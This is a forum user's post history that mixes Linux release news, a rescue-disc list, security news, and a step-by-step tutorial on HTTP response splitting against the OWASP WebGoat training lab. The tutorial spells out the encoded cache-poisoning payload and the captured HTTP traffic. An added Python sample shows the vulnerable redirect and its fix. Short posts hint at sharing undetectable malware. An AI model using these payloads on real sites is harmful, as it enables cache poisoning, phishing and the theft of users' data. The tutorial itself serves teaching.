begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. "1) it's not begood!" oh the horror, why oh why? You can clearly see it's not me, I don't have a beer belly anymore
  2. "Gaming does not exist, has never existed and never will exist on Linux." wtf?
  3. Ultimate Edition, first released in December 2006, is a fork of Ubuntu. The goal of the project is to create a complete, seamlessly integrated, visually stimulating, and easy-to-install operating system. Single-button upgrade is one of several special characteristics of this distribution. Other main features include custom desktop and theme with 3D effects, support for a wide range of networking options, including WiFi and Bluetooth, and integration of many extra applications and package repositories. DistroWatch.com: Ultimate Edition
  4. Steven Shiau has announced the release of Clonezilla Live 1.2.5-17, a new stable version of the specialist live CD designed for hard disk partitioning and cloning: This release of Clonezilla live (1.2.5-17) includes major enhancements, changes and bug fixes.

     MAJOR ENHANCEMENTS and CHANGES:
     * This release was created by live-helper 2.0~a11-1drbl1, and live-initramfs 1.215.1-1drbl-1 is used.
     * A version with pure AMD64 (X86-64) programs was created in this release. It can support large partition (e.g. 10 TB) imaging.
     * The Linux kernel was updated to 2.6.32-12.
     * Partclone was updated to 0.2.9. It has been reported that the speed of this version is much faster than the previous one.
     * Package memtest86+ was updated to 4.10.
     * Package syslinux was updated to 3.86.
     * Package pbzip2 was updated to 1.1.1, and it's the default program for running bzip2 compression and decompression in parallel.
     * Package gzrt was added.
     * Boot parameter "nomodeset" was added with vga=normal to avoid using framebuffer mode in safe graphic mode.

     BUG FIXES
     * VGA failsafe mode was not working.
     * A harmless warning message when running grub2 installation after Ubuntu Lucid is restored was fixed.
     * Suppress and avoid the error message when getting data from EDD.
     * A NFS locking issue found in Clonezilla live 1.2.5-15 was fixed.

     The release announcement. Download (MD5): clonezilla-live-1.2.5-17-i686.iso (118MB), clonezilla-live-1.2.5-17-amd64.iso (131MB).
  5. What is this?
     This site randomly displays the private phone numbers of unsuspecting Facebook users.

     Who made it?
     Hello. I'm Tom Scott. I live at tomscott.com, and you can email me or follow me on Twitter. The lightning photo is from Hugo on Flickr and is under a Creative Commons license.

     How does it work?
     There are uncountable numbers of groups on Facebook called "lost my phone!!!!! need ur numbers!!!!!" or something like that. Most of them are marked as 'public', or 'visible to everyone'. A lot of folks don't understand what that means in Facebook's context — to Facebook, 'everyone' means everyone in the world, whether they're a Facebook member or not. That includes automated programs like Evil, as well as search engines.

     Can you be more specific?
     Evil uses the graph API to search for groups about lost phones. It picks them at random, extracts some of the phone numbers, and then shows them here.

     Are you cracking Facebook?
     This site isn't doing anything that you couldn't already do manually, or by just doing a simple Google search. It's just a bit more dramatic.

     Are you storing the results?
     No. I don't even see the phone numbers. All the processing is happening on your own computer.

     How do I make my number private?
     Go into all the "lost number" groups you've ever joined. Ever. Delete your posts. (You might want to try searching for your own phone number on Google, too; it might turn up in unexpected places.)

     Why do the numbers cluster into area codes?
     Evil reads up to 25 numbers from one group to avoid unnecessary strain on Facebook. These tend to be friends in the same geographical area, hence, the same code. Give it a few seconds, it'll change.

     Why are you censoring the last few digits?
     It's called Evil, not diabolic. Those digits are publicly available though, and I - or anyone malicious - could easily flick a metaphorical switch and show them here. Or produce a phone directory. Or nick them for marketing. Don't forget, the Facebook pages you "Like" are public too.

     It's broken!
     Quite possibly. This was coded in a few hours' frenzy after getting the idea, and there are almost certainly bugs. A great flood of users (more than one every two seconds) may also trigger Facebook's rate limiting. Needless to say, this site is not affiliated with Facebook, which may also hamper it from time to time.

     Why's it called Evil?
     Because it's evil. Duh.

     http://www.tomscott.com/evil/
  6. @Ellimist thank you and sorry about that.
  7. I have asked myself this question countless times, without being able to reach any particular conclusion. A few examples: "I took this photo with my Nikon D90 camera :> isn't Nikon the best camera in the world? The photo wouldn't have come out the same with another camera!" "linux rulz, windows suckz" "mac rulz, windows suckz" We idolize tools, we say "omg this is the best camera in the world, it's awesome, it's much better than your camera, my camera is perfect bla bla bla" but we forget that there are hundreds of others just as good, which do exactly the same thing: they solve the same problem just as well, maybe even much better. For example, I hammer a nail into wood. Who cares that I used the mx2n-type hammer from the company Musz inc. as long as it did its job, the nail went nicely into the wood, and I like using it? Where does the obsession with the tool come from, why don't we focus on the way it is used? What is your obsession, why do you think people idolize certain things, and why/from where do you think you have these obsessions?
  8. HTTP splitting is a website attack. It involves an injection of an HTTP request into a form to force the target server to return two answers instead of one. It is possible due to the redirection of a request (code 3xx, "set-cookie" or "Location") without checking illegal characters. This article describes this attack and the OWASP WebGoat training platform. A French version of this article is also available.

     description

     In a normal operation, each client sends an HTTP request, and the server responds. With an HTTP splitting attack, an attacker fills the form with malformed data (textField). The server then sends back two responses, one of which was created by the attacker.

     exploitation

     This technique allows:

     cache poisoning
     The attacker sends two requests, a first malformed one and a second valid one. The server sends back two responses from the first request, and a third one from the second request. The server cache makes an association between the second request (created by the attacker) and the second request (valid). The attacker can obtain a defacement of the website.

     next generation phishing
     This is a special case of the previous cache poisoning technique. The attacker chooses, in his second request, a password form webpage. He puts a copy of this page in his first request. This page redirects the request to a server controlled by the attacker. The vulnerable server caches this page for further requests. As a result, when a victim asks later for the server password webpage, she is instead redirected to the attacker webpage (phishing). The attacker can store the victim's password.

     webpage hijacking
     The next step of attacks is the hijacking of webpages containing user data, when a (not vulnerable) proxy is placed between the vulnerable server and the client.
     - The attacker sends a malformed request (1) to the proxy.
     - The proxy redirects the malformed request (1) to the server.
     - The server sends back the two split responses (1) and (2) to the proxy.
     - A victim sends a regular request (3) to the server through the proxy.
     - The proxy immediately sends the response (2) as the response to this request.
     - The server sends the response to the request (3) to the proxy. This response holds the user's personal data.
     - The attacker sends another request (4) to the proxy.
     - The proxy immediately sends to the attacker the response (3).

     method

     For an illustration of the method, please see Yehg video ([9]) and Ajax blog ([6]). In this example we conduct a cache poisoning attack. Here is the injected text:

     "Content-Length: 0

     HTTP/1.1 200 OK
     Last-Modified: Fri, 31 Dec 2099 23:59:59 GMT
     coucou"

     When this text is encoded in HTTP, replace:
     - ":" by %3A
     - "space" by %20
     - "carriage return" by %0A
     - "," by %2c
     - "/" by %2F
     - "<" by %3C
     - ">" by %3E

     result in HTTP:

     "Content-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0A%3Chtml%3E%0Acoucou%3C%2Fhtml%3E"

     replace every %0A by %0A%0D:

     "Content-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E"

     To encode and replace %0A, let's use PHP charset encoder http://h4k.in/encoding/ (cf. Yehg video [9]).

     explanations

     This technique needs a redirection of pages:
     Remember: with this method, the server must put data entered by the attacker in the header of a redirected request (code 3xx, "Set-Cookie" or "Location" fields): In the HTTP protocol, with a redirection, data are put in the header of the new redirected request [3]. Usually, they are in the header's fields "Set-Cookie" or "Location".

     Why %0d%0a?
     CR = Carriage return (%0d or \r or ASCII 13)
     LF = Line Feed (%0a or \n or ASCII 10)
     HTTP is built as follows:
     - initial line, ends with CRLF
     - header lines, end with CRLF
     - blank line (= CRLF)
     - body.
     As our string must be interpreted as an HTTP request we replace LF by CRLF.

     Why a cache poisoning?
     Response from server contains line Last-Modified, with date defined as 2099.

     HTTP/1.1 200 OK
     Last-Modified: Fri, 31 Dec 2099 23:59:59 GMT
     coucou

     This page is associated with any further request to the server: as its date is bigger than the current date, it is never replaced by a newer one.

     What happens on the server side?
     Let's use the example given with WebGoat. Let's intercept HTTP requests with WebScarab:

     Write "essai" in textfield. The request sent to Server (A) is:

     POST HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip,deflate
     Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
     Keep-Alive: 300
     Proxy-Connection: keep-alive
     Referer:
     Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE
     Content-Type: application/x-www-form-urlencoded
     Content-length: 31
     Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

     language=essai&SUBMIT=Search%21

     The redirection response (302) received from server (A) is:

     HTTP/1.1 302 Déplacé Temporairement
     Server: Apache-Coyote/1.1
     Location: &fromRedirect=yes&language=essai
     Content-Type: text/html;charset=ISO-8859-1
     Content-length: 0
     Date: Sat, 19 Dec 2009 17:12:27 GMT

     result:
     - this response is a redirection (status code 302),
     - our string is put in field "Location" of the header

     Server (A) redirects the request to server (B):

     GET HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip,deflate
     Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
     Keep-Alive: 300
     Proxy-Connection: keep-alive
     Referer: &Restart=3
     Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE
     Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

     Response from server (B) shows the resulting page. Here it is (truncated):

     HTTP/1.1 200 OK
     Server: Apache-Coyote/1.1
     Pragma: No-cache
     Cache-Control: no-cache
     Expires: Thu, 01 Jan 1970 01:00:00 CET
     Content-Type: text/html;charset=ISO-8859-1
     X-Transfer-Encoding: chunked
     Date: Sat, 19 Dec 2009 17:37:46 GMT
     Content-length: 33406

     <.!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
     <.html xmlns="http://www.w3.org/1999/xhtml">
     <.head>
     <.meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
     <.title>HTTP Splitting
     <.link rel= (...) />
     <.script language= (...)
     <.body class="page" (...)

     Now inject the malformed request. The request from client to server (A) is:

     POST HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip,deflate
     Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
     Keep-Alive: 300
     Proxy-Connection: keep-alive
     Referer:
     Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE
     Content-Type: application/x-www-form-urlencoded
     Content-length: 251
     Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

     language=Content-Length%253A%25200%250D%250A%250D%250AHTTP%252F1.1%2520200%2520OK%250D%250ALast-Modified%253A%2520Fri%252C%252031%2520Dec%25202099%252023%253A59%253A59%2520GMT%250D%250A%253Chtml%253E%250D%250Acoucou%253C%252Fhtml%253E&SUBMIT=Search%21

     The redirection response (302) received from server (A) is:

     HTTP/1.1 302 Déplacé Temporairement
     Server: Apache-Coyote/1.1
     Location: &fromRedirect=yes&language=Content-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E
     Content-Type: text/html;charset=ISO-8859-1
     Content-length: 0
     Date: Sat, 19 Dec 2009 17:26:09 GMT

     Server (A) "believes" it redirects the request to server (B):

     GET %0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
     Accept-Encoding: gzip,deflate
     Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
     Keep-Alive: 300
     Proxy-Connection: keep-alive
     Referer: &Restart=3
     Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE
     Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

     This response is encapsulated by the HTTP protocol in TCP datagrams as follows:

     * empty redirection request sent to server (B)
       GET
     * end of the request
       %0D%0A %0D%0A
     * response sent in current TCP session (to attacker)
       HTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E
     * data rejected (not compatible with the HTTP protocol):
       HTTP/1.1
       Host: localhost
       User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
       Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
       Accept-Encoding: gzip,deflate
       Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
       Keep-Alive: 300
       Proxy-Connection: keep-alive
       Referer: &Restart=3
       Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE
       Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

     - and here is the second message sent by server (A) to the attacker:

     HTTP/1.1 200 OK
     Server: Apache-Coyote/1.1
     Pragma: No-cache
     Cache-Control: no-cache
     Expires: Thu, 01 Jan 1970 01:00:00 CET
     Content-Type: text/html
     X-Transfer-Encoding: chunked
     Date: Sat, 19 Dec 2009 17:28:10 GMT
     Content-length: 21

     coucou

     remarks

     - Splitting attacks can be logged by the target site if they are sent with the GET method. Usually, it is not the case as attackers should prefer using POST requests ([2], page 24).
     - Splitting attack defacement is not detected by anti-defacement IDS. Indeed, these IDS usually analyse static pages, and not the cache.
     - This attack is possible because of HTTP version 1.1. HTTP 1.1 allows client and server to exchange multiple requests in the same TCP session. Before, HTTP 1.0 needed a TCP connection for each HTTP exchange.

     Tools

     java-JRE http://www.java.com/fr/download/
     OWASP WebGoat http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
     PHP charset encoder http://h4k.in/encoding/

     references

     1) Wikipedia - Http response splitting - http://en.wikipedia.org/wiki/HTTP_response_splitting
     2) Sanctum Inc, Http response Splitting whitepaper - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
     3) James Marshall - Http made really easy - http://www.jmarshall.com/easy/http/#structure
     4) Web application security consortium - Http response splitting - http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml
     5) Securiteam - http response splitting - http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
     6) Ajax - Séparation de réponse http - http://blog.4j4x.net/?p=15
     7) CERT-IST publication - "http response splitting" type attacks - http://www.cert-ist.com/fra/ressources/Publications_ArticlesBulletins/Veilletechnologique/HTTP_spliting/
     8) OWASP - Http response splitting - http://www.owasp.org/index.php/HTTP_Response_Splitting
     9) yehg - video describing an exploitation of the http splitting attack - http://yehg.net/lab/pr0js/training/webgoat.php
     9) MISC n°24 - http://www.unixgarden.com/index.php/administration-reseau/smuggling-et-splitting-du-html

     source : http://infond.blogspot.com/2010/04/tutorial-http-splitting-attack-with.html
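The missing check on illegal characters that post 8 names as the cause, shown as an added example that is not part of the original post or of WebGoat: a redirect handler that copies the `language` field into `Location` unchecked, next to one that rejects CR/LF even when it is percent-encoded twice, as in the captured POST. The `/lesson` path, the function names and the sample field value are assumptions constructed for illustration.

```python
import re
from urllib.parse import quote, unquote

LINE_BREAK = re.compile(r"[\r\n\x00]")
BASE = "/lesson"  # hypothetical path; the URL in the post's captures is elided

# Constructed sample: double-encoded CR LF followed by a harmless marker header,
# the same encoding depth as the `language` field in the post (%250D%250A).
SAMPLE_FIELD = "en%250D%250AX-Constructed%253A%25201"


def decode_until_stable(value, max_rounds=4):
    """Percent-decode repeatedly; return (decoded, stable)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value, True
        value = decoded
    # Still changing after max_rounds: caller should treat it as hostile.
    return value, unquote(value) == value


def is_header_safe(value):
    """True only if no decoding depth reveals CR, LF or NUL."""
    decoded, stable = decode_until_stable(value)
    return stable and not LINE_BREAK.search(decoded)


def _response(location_value):
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {BASE}?fromRedirect=yes&language={location_value}\r\n"
            "Content-Length: 0\r\n\r\n").encode("utf-8")


def redirect_vulnerable(language):
    """Hypothetical handler: decodes the field twice and copies it unchecked."""
    return _response(unquote(unquote(language)))


def redirect_hardened(language):
    """Reject header-breaking input, then re-encode what is written out."""
    if not is_header_safe(language):
        raise ValueError("CR/LF or NUL in redirect parameter")
    return _response(quote(unquote(language), safe=""))


def header_fields(raw):
    """Header names in the first header block of a raw response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("utf-8")
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]


if __name__ == "__main__":
    print("vulnerable:", header_fields(redirect_vulnerable(SAMPLE_FIELD)))
    print("hardened  :", header_fields(redirect_hardened("essai")))
    try:
        redirect_hardened(SAMPLE_FIELD)
    except ValueError as exc:
        print("rejected  :", exc)
```

The same `is_header_safe` check can be run over logged request parameters to flag encoded CR/LF in values that end up in `Location` or `Set-Cookie`.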
  9. WeakNet Labs has just released the latest version of its highly customized WeakNet Linux, a penetration testing Linux distribution packed with goodies for security experts and sysadmins, but not only. WeakNet Linux IV brings the first release of the custom WeakerThan Linux kernel with built-in support for packet injection and a faster boot time. It also comes with a lot of tools for testing a network’s strength to attacks and other types of security-related testing. WeakNet Linux IV packs in a lot of punch. The OS boots lightning-fast, thanks to a great deal of optimizations on this part. It’s very lightweight, it uses Fluxbox as a window manager and most utilities have been chosen with speed in mind. Google Chrome is now the default web browser, its speed and relatively small memory footprint made it a perfect candidate for WeakNet. WeakNet Linux IV also gets a visual revamp with a new Fluxbox theme and boot splash. WeakNet Linux IV Applications (including full list) and Themes and more)

     Highlights of WeakNet Linux IV:
     · WeakerThan Linux kernel 1.0;
     · Wireless penetration testing tools: FreeRADIUS WPE edition, AIRPWN, a customized Kismet, and a lot more;
     · Better wireless support, with Ath9k, Ath5k, Rt73USB and Broadcom drivers modified for packet injection;
     · Boots directly into X, skips any graphical login manager;
     · More ‘user-friendly’ pen testing tools;
     · FTP and networking clients like VNC and Filezilla;
     · Better MITM (Man-in-the-middle) support and new apps;
     · Google Chrome replaces Mozilla Firefox;
     · RAV hunter - a new tool that seeks and destroys rogue antivirus clients on infected Windows machines;
     · SAM Hunter - a utility to reset passwords on Windows 7, Vista, XP and NT machines;
     · Technician utilities - a bunch of utilities for Windows and Mac admin and security-related jobs.
  10. The Windows boot process is a fragile thing. A single corrupt byte on your hard drive, a buggy boot driver or missing Registry key could be enough to break it. And that'll leave you staring at an error message, or maybe a blank screen, the next time you start your PC. Windows has plenty of recovery options, of course - Safe Mode, Last Known Good Configuration, Startup Repair - but if these fail to deliver, and you've no recent backups to restore, then you'll need to look further afield. Fortunately there are plenty of recovery options available. If your troubles are due to malware, for instance, then many of the top antivirus vendors offer free bootable rescue CDs that might be able to help. But if the virus has damaged some critical file or hard drive structure then removing the malware alone won't be enough. So you may need a recovery disc with extra powers, something that can fix broken boot records, solve partition problems, scan the Registry and more. Whatever approach you take, be careful: an inappropriate "fix" can cause more problems than it solves. If possible, we'd recommend you back up your hard drive before you start, so it can be restored later if necessary. And with that done, you can go looking for a recovery disc to suit your needs. Or, better still, check our list, download any that appeal, and you'll have them to hand if disaster strikes.

      1. AVG Rescue CD, 69.3MB
      The AVG Rescue CD is a portable version of AVG Anti-Virus that can be launched from a CD or USB flash drive. It will then try to obtain the latest antivirus definitions, if an internet connection is available, before scouring your PC for malware and removing anything it uncovers. There's more to the disc than antivirus, though. You also get TestDisk, a powerful tool that can solve partition problems and fix broken boot records, as well as sorting out many other hard drive issues. A simple Registry editor lets you tweak your PC's Registry (if it's accessible). And if all else fails then you may at least be able to recover important documents with Midnight Commander, a capable file manager.

      2. Avira AntiVir Rescue System, 64.2MB
      The Avira AntiVir Rescue System is updated several times a day to ensure it always contains the most recent antivirus definitions. So if you need a recovery disc, then download the latest version from another computer, run it, and allow the program to burn a boot CD for you (there's no bootable flash drive option). Launch your PC from the Rescue System and you'll find an easy-to-use GUI with some useful configuration options. It can try to download more updates, if a network connection is available, and will then set to work scanning your system for threats. If the antivirus engine doesn't get your PC running again, though, there's little else here to help. You can open a Linux command window to try and explore the stricken PC further, but that's all.

      3. BitDefender Rescue CD, 260MB
      The BitDefender Rescue CD works much like most of the antivirus competition: burn its ISO file to CD, boot from this and you'll be able to download the latest virus definitions, then scan your system for malware. What's a little different, though, is the range of extras that you get as well. There are text editors (Vim, Xedit), file managers (Midnight Commander, RoxFiler), Firefox, a rootkit detector (ChkRootkit), the Nexus Network Scanner, and a whole lot more. Of course these are all Linux-based tools (Knoppix, to be precise), so if you're strictly Windows-only then it may take a while to figure out what's going on, but this is still an above-average recovery CD.

      4. Hiren's BootCD, 187MB
      Hiren's BootCD is an amazing LiveCD with an array of troubleshooting utilities. Useful antivirus tools include Spybot - Search & Destroy and Malwarebytes Anti-Malware; there are a stack of utilities to check your master boot record and partition table and fix any problems; and others can reset a forgotten Windows password, finally allowing you to log on. You'll also find system information tools, memory testers, network utilities, BIOS tools and more. You need to be careful when using some of these, as many of the tools won't work on anything later than Windows XP, and in fact could cause problems with later systems. But still, if your PC won't boot and you've no idea why then this is one of the best places to start finding out.

      5. Norton Bootable Recovery Tool, 167.63MB
      Run the new Norton Bootable Recovery Tool (NBRT) and it'll quickly create a bootable CD, DVD or USB flash drive with the very latest Norton antivirus tools. And it's such a sophisticated disc builder that you can even include your choice of drivers, useful if you need RAID support. If your PC isn't booting due to a malware-related issue then this just might be enough to get it running again. The NBRT will be bundled with Norton Internet Security 2011, and so you'll need a product key from the NIS 2011 beta before you can use it. This only takes a moment: just visit the beta registration page, enter your details and you'll be sent a product key via email. (There's no need to download the NIS 2011 beta unless you're interested in that as well.)

      6. Paragon Rescue Kit Express, 45.7MB
      Paragon Rescue Kit Express may be a cut-down version of the full Rescue Kit package, but it could still come in very useful. The program creates a bootable CD that includes the Boot Corrector, a useful tool that can fix many common boot problems. There's an Undelete Partition Wizard to restore accidentally deleted or lost partitions. And if these don't work, the File Transfer Wizard will at least help you export critical files from your broken PC to another system. Please note that Rescue Kit Express is free for non-commercial use only, and you must register with Paragon before you can create the boot disc.

      7. Parted Magic, 79.4 MB
      Parted Magic is a Live CD that takes components from Parted and Gparted to deliver a great deal of partitioning power, in an attractive and easy-to-use interface. There's little in the way of recovery options, unfortunately, but Parted Magic does include many other tools that may be able to help. TestDisk will try to locate lost partitions, for instance. Browsers will take you online, if there's an internet connection available, for more advice. And a variety of backup tools will copy files or clone your hard drive, useful as a precaution if your attempts to fix the boot problems actually make things worse.

      8. Partition Wizard, 39.2MB
      Partition Wizard's recovery disc comes in a relatively compact 39MB ISO file, but it still manages to cram in plenty of hard drive-related functionality, and an easy-to-use GUI. The key function on offer here is the ability to rebuild your hard drive's Master Boot Record, the structure that stores vital information like your partition table. And there's also a partition recovery wizard that will scan your drive for lost or deleted partitions. But if you need them, there are plenty of other functions on offer: you can move, resize, merge or copy partitions, convert a partition's file system, convert a dynamic disk to a basic disk, and more.

      9. Trinity Rescue Kit, 118MB
      The Trinity Rescue Kit is another Live CD that specialises in system repair and recovery functions. There are tools to rebuild the partition table, reset passwords, detect viruses and recover data, and you also get a samba server, ssh server, disk cloning and more. The system is command-line based, though, so don't expect much in the way of handholding. It's also looking a little dated at the moment; the site warns that "virusscan is still largely broken because of AV vendor side changes", and the last release was in July 2009 so it's probably not a good idea to try the disc on a Windows 7 system. Still, if the author releases an update soon, or you know what you're doing at the Linux command line, then the Trinity Rescue Kit could still be worth a look.

      10. Shardana Antivirus Rescue Disk Utility, 3.01MB
      If you've read our list and are unsure which might be the best recovery disc for you, then Shardana may have the answer. It's able to combine the boot discs of many different companies and tools - AVG, Avira, BitDefender, F-Secure, GData, Panda, Parted Magic, Partition Wizard and more - into a single package, then create just one ISO file or bootable USB flash drive that will run them all. The program doesn't come with the various ISO files, of course: you'll have to download them yourself. And we wouldn't be at all surprised if installing multiple antivirus tools on the same disc resulted in occasional conflicts and odd behaviour. If you're willing to take the time to experiment, though, SARDU really could help you create the ultimate in bootable system recovery discs.

      Read more: 10 free tools to get an unbootable PC working | News | TechRadar UK
  11. heavy advertising.
  12. Did it work for anyone? If not, it will be deleted. @totti93 I'll ask once more: why did you encrypt it?
  13. This is the second of two articles looking at nanotechnology as a future technological risk. One of the scariest issues I can think of with respect to nanotechnology is self-replicating nanobots. The prospect of loosing little machines that can copy themselves without specific external control raises the specter of "The Sorcerer's Apprentice" and Mickey Mouse in that role in Disney's 1940 animated film, Fantasia. For science fiction fans, there are many examples of self-replicating machines to titillate or terrify; the replicators in the Stargate universe come to mind. In the information assurance field, it is pretty well established that creating self-replicating code, even for the best of intentions, is a bad idea; the fundamental problem is that no matter how carefully one applies quality assurance and testing to such code, external conditions are inevitably more variable than anything that can be tested in a finite time. Just think about all the combinations of operating system versions, update levels, application software, versions of that software, configuration combinations for all of the above, and run-time variations in when and how code segments are executed. For a classic and thorough review of the arguments, see Vesselin Bontchev's 1994 paper, "Are 'Good' Computer Viruses Still a Bad Idea?" which actually concludes that they could be a good idea (I still disagree, but it's a good paper). Self-replicating nanobots :: Hack In The Box :: Keeping Knowledge Free
  14. A researcher with anti-virus software vendor Sunbelt, Christopher Boyd, has recently discovered a tool that facilitates in building armies of bots which take their instructions from specific Twitter accounts, as per the news published by The Register on May 13, 2010. The tool, known as TwitterNET Builder, creates malicious executables which hackers can forward to the systems of other users. They can either send mails with file attachments or send the instant messages bearing links to the infected executables. On opening the files, user's PC gets infected with malware that allows cybercriminals to manage it through a Twitter account. Moreover, networks of infected PCs (called botnets) can then flood websites with traffic, which causes them to distribute denial-of-service (DDoS) attacks by means of User Datagram Protocol (UDP). It can successfully open a webpage, halt all bot activities and eliminate connecting bots. They can be used to distribute junk e-mails and a higher number of malware. The security researchers explained that however it is not known to have any autostart technique or propagation capability, but even then the attacker could probably install the bot server manually onto a PC, or could deceive a user to run the file. So they advised users to be careful while opening attachments or running files originating from unknown and unreliable sources. In the meantime, Twitter was informed about the potential danger of the botnet and they are taking apt measures to block the further propagation of this malware. Boyd applauded Twitter for handling the issue seriously. He recalled that it took precisely 13 minutes to reply to his e-mail, which seems quite impressive when we talk of standards, as per the news published by Webuser on May 13, 2010. It is learnt that Twitter has been misused as a command and control centre in past also. In 2009, cybercriminals used Twitter to run botnets. 
According to security researchers at security firm F-Secure, a network of compromised computers was given directions through a fake Twitter account. Besides Twitter, Facebook, Google Groups and Google's AppEngine are some other examples of this cloud-based model. Twitter Botnet Facilitator Tool Identified - SPAMfighter
  15. how generous you are, one post and you're already giving us something FUD for free, eh... ban
  16. Absinthe is a GUI-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection. Absinthe does not aid in the discovery of SQL Injection holes. This tool will only speed up the process of data recovery.

    Features:
    • Automated SQL Injection
    • Supports MS SQL Server, MSDE, Oracle, Postgres
    • Cookies / Additional HTTP Headers
    • Query Termination
    • Additional text appended to queries
    • Supports Use of Proxies / Proxy Rotation
    • Multiple filters for page profiling
    • Custom Delimiters

    0x90.org // [Absinthe :: Automated Blind SQL Injection] // ver1.3.1
  17. post the executable :]
  18. neah, it's cute.
  19. I still have some living to do
  20. you add it to startup through several methods :] oh the good old days...
  21. begood

    The Hack FAQ

    The Hack FAQ: Table of Contents

    1.0 Administrivia
    What is the mission and goal of this FAQ? How was this FAQ prepared? How do I add to this FAQ? Contributors Other Credits Where can I download this FAQ? Where is the disclaimer? Changelog

    2.0 Attack Basics
    What are the four steps to hacking?

    3.0 Account Basics
    What are accounts? What are groups?

    4.0 Password Basics
    What are some password basics? Why protect the hashes? What is a dictionary password cracker? What is a brute force password cracker? Which method is best for cracking? What is a salt? What are the dangers of cracking passwords? Where are the password hashes stored? Are there any password schemes that are safe? Is there any way I can open a password-protected Microsoft Office document?

    5.0 Denial of Service Basics
    What is Denial of Service? What are some DoS scenarios? What is the Ping of Death? What is a SYN Flood attack? What are other popular DoS attacks? What are distributed DoS attacks? How can I discover new DoS attacks? How does one defend against DoS attacks?

    6.0 Logging Basics
    Why do I care about auditing, accounting, and logging? What are some different logging techniques used by Admins? Why should I not just delete the log files?

    7.0 Miscellaneous Basics
    What is a backdoor? What is a buffer overflow? What is "lame"? How do I get around censorware like Net Nanny or the Great Firewall of China? How can I forge email addresses? What's with ICQ?

    8.0 Web Browser
    What is unsafe about my browser? What is in the history, bookmark, and cache files? What other browser files are important? Can you tell me more about the cookie file? How can I protect my browser files? So why all of the paranoia about browsers?

    9.0 The Web Browser as an Attack Tool
